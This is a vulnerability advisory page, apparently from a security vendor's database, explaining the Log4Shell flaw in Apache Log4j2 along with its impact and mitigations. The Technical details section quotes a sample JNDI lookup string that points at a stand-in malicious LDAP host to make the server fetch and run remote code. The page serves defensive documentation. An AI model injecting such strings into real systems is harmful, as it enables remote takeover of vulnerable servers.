Vulnerability DatabaseGHSA-mf4f-j588-5xm8

GHSA-mf4f-j588-5xm8
Java vulnerability analysis and mitigation

Overview

Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) contains a critical vulnerability (CVE-2021-44228) known as Log4Shell, discovered in December 2021. The vulnerability affects the JNDI features used in configuration, log messages, and parameters, which do not protect against attacker-controlled LDAP and other JNDI-related endpoints. This vulnerability earned a CVSS score of 10.0 (Critical) due to its ease of exploitation and potential for full remote code execution (FortiGuard Labs, NVD).

Technical details

The vulnerability stems from Log4j's interface with the JNDI (Java Naming and Directory Interface), which allows connection to external directory services such as LDAP. When message lookup substitution is enabled, an attacker can exploit this by adding a JNDI query to a connection request in a field that gets logged via Log4j. For example, using a string like '${jndi:ldap://malicious-server.host/aaa}'. When processed, the vulnerable Log4j version attempts to contact the malicious server with an LDAP query, which can result in downloading and executing malicious Java class files (FortiGuard Labs).

Impact

The vulnerability allows attackers who can control log messages or log message parameters to execute arbitrary code loaded from LDAP servers. This can lead to full remote code execution on the target system, potentially giving attackers complete control over vulnerable systems. The widespread use of Log4j in enterprise applications and cloud services makes this vulnerability particularly severe, with millions of applications including iCloud, Steam, and Minecraft being potentially affected (FortiGuard Labs).

Mitigation and workarounds

For Java 8 or later users, updating to Log4j 2.17.0 is recommended. For Java 7 users, upgrading to version 2.12.2 is advised. Alternative mitigations include setting the system property log4j2.formatMsgNoLookups to true or removing the JndiLookup class from the classpath. The vulnerability only impacts the log4j-core JAR file; applications using only the log4j-api JAR file without the log4j-core JAR file are not affected (FortiGuard Labs).

Community reactions

The severity of the vulnerability prompted SANS to move their Infocon alert to yellow for the first time since the WannaCry outbreak in 2017. This level of alert has only previously been elevated for severe incidents such as Heartbleed and Shellshock. The vulnerability received widespread attention from the security community and vendors, with major companies like Microsoft, Oracle, and Cisco releasing advisories and patches for their affected products (FortiGuard Labs).

Additional resources


SourceThis report was generated using AI

Related Java vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2025-68931HIGH8.7
  • JavaJava
  • net.gleske:jervis
NoYesJan 13, 2026
CVE-2025-68703HIGH8.7
  • JavaJava
  • net.gleske:jervis
NoYesJan 13, 2026
CVE-2025-68704HIGH8.2
  • JavaJava
  • net.gleske:jervis
NoYesJan 13, 2026
CVE-2025-66169MEDIUM6.9
  • JavaJava
  • org.apache.camel:camel-neo4j
NoYesJan 14, 2026
CVE-2025-68925MEDIUM6.9
  • JavaJava
  • net.gleske:jervis
NoYesJan 13, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management